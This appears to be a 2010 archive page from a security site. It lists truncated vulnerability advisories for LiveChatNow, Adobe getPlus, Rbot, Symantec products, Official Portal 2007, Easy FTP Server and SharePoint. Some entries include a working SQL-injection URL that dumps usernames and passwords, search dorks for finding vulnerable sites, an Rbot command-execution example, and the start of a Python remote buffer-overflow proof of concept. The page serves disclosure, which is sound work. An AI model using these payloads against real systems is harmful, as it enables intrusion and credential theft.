Home » 2010 » February » 25
# Title: [SQL injection vulnerability in LiveChatNow]
# Date: [20.02.2010]
# Author: [Ariko-Security]
# Software Link: [http://www.livechatnow.com/]
# Version: [ALL]
# Tested on: [freebsd / ubuntu]


============ { Ariko-Security - Advisory #4/2/2010 } =============

      SQL injection vulnerability in LiveChatNow



Vendor's Description of Software:
# http://www.livechatnow.com/
#demo


http://zebra.livechatnow.com/js/enter.php?cid=7546&skin=&survey=&survey_ec

=&survey_lm=&group=On-Duty+
Techs

Dork:
#Powered by www.LiveChatNow.co ... Read more »
Views: 1073 | Added by: b1zz4rd | Date: 2010-02-25 | Comments (0)

iDefense Security Advisory 02.23.10
http://labs.idefense.com/intelligence/vulnerabilities/
Feb 23, 2010

I. BACKGROUND

The getPlus Downloader is an application download and installation
manager, distributed in the form of an ActiveX control. This control is
used by Adobe Systems Inc. to install Adobe Reader through the Adobe
website when Internet Explorer is used. Part of the functionality of
the getPlus Downloader is to download and execute applications from
preconfigured sites; in the case of Adobe, from adobe.com and its
subdomains. For more information, see the vendor's site found at the
following link.

http://www.nosltd.com/index.php?option=com_content&task= ... Read more »
Views: 6132 | Added by: b1zz4rd | Date: 2010-02-25 | Comments (0)

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- - Product

Rbot (aka Rubybot) is a very powerful and feature rich IRC Bot written
in ruby: "Think of him as a ruby bot framework with a highly modular
design based around plugins." [1]

[1] http://ruby-rbot.org/

- - Vulnerability

The reaction plugin allows anyone to create reactions that are
triggered by certain words or regular expressions. There normal message
replies and two special reactions that can be triggered: ruby code and
bot command execution. The ruby action is correctly only allowed for
bot owners, but the command execution is not.

Here is an example for that:
<attacker> !react to /attacker:.*/ with cmd:whoami
 now the attacker is provoking a manual highlight from the bot owner:
<attacker> botowner: ping?
<botowner> attacker: pong, what's up?
<rbot> ... Read more »
Views: 798 | Added by: b1zz4rd | Date: 2010-02-25 | Comments (1)

VUPEN Security Research - Symantec Products "SYMLTCOM.dll" Buffer Overflow Vulnerability

http://www.vupen.com/english/research.php


I. DESCRIPTION
---------------------
VUPEN Vulnerability Research Team discovered a vulnerability in various
Symantec security products.

The vulnerability is caused by a buffer overflow error in the SYMLTCOM.dll
module when processing user-supplied data, which could be exploited by
remote attackers to execute arbitrary code by tricking a user into visiting
a specially crafted web page on a domain masqueraded as an authorized site.


II. AFFECTED PRODUCTS
------------------------------
--

Symantec N360 version 1.0
Symantec N360 version 2.0
Symantec Norton Internet Security 2006 through 2008
Symantec Norton AntiVirus 2006 through 2008
Symantec Norton Syste ... Read more »
Views: 679 | Added by: b1zz4rd | Date: 2010-02-25 | Comments (0)

##############################
###################################
# Securitylab.ir
#################################################################
# Application Info:
# Name: Official Portal 2007
#################################################################
# Vulnerability Info:
# Type: Sql Injection/XSS
# Risk: Medium
# Dork: "Official Portal 2007"
#################################################################
Vulnerability:
=======================
Sql Injection
=======================
http://site.com/?fa=content.detail&id=-72+union+select+1,concat_ws%280x3a,userid,username,pwd%29,3,4,5,6,7,8,9,10,11+from+tuser--

=======================
Cross Site Scrip ... Read more »
Views: 1107 | Added by: b1zz4rd | Date: 2010-02-25 | Comments (0)

Digital Security Research Group [DSecRG] Advisory       #DSECRG-09-039

Application:                    Symantec Antivirus Client Proxy
Versions Affected:              Version 10
Vendor URL:                     http://symantec.com
Bugs:                           Buffer Overflow
Exploits:                       POC
Reported:                       04.05.2009
Vendor response:                07.05.2009
Date of Public Advisory:        17.02.2010
CVE-number:               ... Read more »
Views: 5701 | Added by: b1zz4rd | Date: 2010-02-25 | Comments (0)

* Other vulnerabilities covered in bid:38262 *

=== Infos ===

Credit: loneferret
Found: 18/02/10
Versions affected <= 1.7.0.2

=== Description ===

Lack of input length checks for the CWD command result in a buffer overflow vulnerability, allowing the execution of arbitrary code by a remote attacker.

=== Workaround ===

Upgrade to the latest version - 1.7.0.12

=== PoC ===

#!/usr/bin/python
import socket, sys

print """
******************************
*******************
*       Easy FTP Server 1.7.0.2 Remote BoF      *
*           Discovered by: Jon Butler           *
*       jonbutler88[at]googlemail[dot]com       *
*************************************************
"""

if len(sys.argv) != 3:
    &nbs ... Read more »
Views: 5635 | Added by: b1zz4rd | Date: 2010-02-25 | Comments (0)


  (    , )     (,
 .   `.' ) ('.    ',
  ). , ('.   ( ) (
 (_,) .`), ) _ _,
 /  _____/  / _  \    ____  ____   _____
 \____  \==/ /_\  \ _/ ___\/  _ \ /     \
 /       \/   |    \\  \__(  <_> )  Y Y  \
/______  /\___|__  / \___  >____/|__|_|  /
       \/         \/.-.    \/         \/:wq
                   (x.0)
                 '=.|w|.='
                 _='`"``=.

              &n ... Read more »
Views: 918 | Added by: b1zz4rd | Date: 2010-02-25 | Comments (0)

Hacktics Research Group Security Advisory
http://www.hacktics.com/#view=Resources%7CAdvisory

By Irene Abezgauz, Hacktics.
22-Feb-2010

===========
I. Overview
===========
During a penetration test performed by Hacktics' experts, a persistent
cross-site scripting vulnerability was identified in the SharePoint document
handling module. This vulnerability allows attackers to gain control over
valid user accounts, perform operations on their behalf, redirect them to
malicious sites, steal their credentials, and more.

A friendly formatted version of this advisory, including a video
demonstrating step-by-step execution of the exploit, is available in:
  http://www.hacktics.com/content/advisories/AdvMS20100222.html

========= ... Read more »
Views: 1015 | Added by: b1zz4rd | Date: 2010-02-25 | Comments (0)